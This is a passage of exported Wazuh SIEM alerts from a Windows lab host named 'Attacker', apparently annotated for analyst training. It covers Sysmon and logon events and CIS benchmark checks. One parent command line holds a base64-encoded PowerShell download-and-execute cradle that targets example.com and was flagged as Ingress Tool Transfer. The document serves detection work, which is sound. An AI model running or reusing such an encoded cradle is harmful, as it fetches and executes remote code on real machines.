data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 116 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534438.2122420 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:36.7393600Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:36.716
ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00}
ProcessId: 6708
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_incsmgqj.jzi.ps1
CreationUtcTime: 2025-04-24 22:40:36.716
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:36.716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde3-680a-db0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6708 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_incsmgqj.jzi.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:36.716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534468.2125185 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26163 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authorization Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authorization Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authorization Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534492.2128210 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:27.0967356Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43893 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534507.2135547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26164 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534509.2141014 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:41.9709687Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43895 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 15764 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32) Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19004 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534518.2148353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: summary Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.description: This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11. No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.policy_id: cis_win11_enterprise_21H2 Internal numeric ID for that policy.
data.sca.passed: 121 Checks that were green – a quick confidence boost.
data.sca.failed: 249 Number of failed checks in the scan. Lots of red means poor hygiene.
data.sca.invalid: 25 Checks that couldn’t run (permissions, missing file, etc.).
data.sca.total_checks: 395 Total tests executed this run.
data.sca.score: 32 Overall compliance score 0‑100%. Under 85% usually needs remediation.
data.sca.file: cis_win11_enterprise.yml No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534518.2149670 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26000 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enforce password history' is set to '24 or more password(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
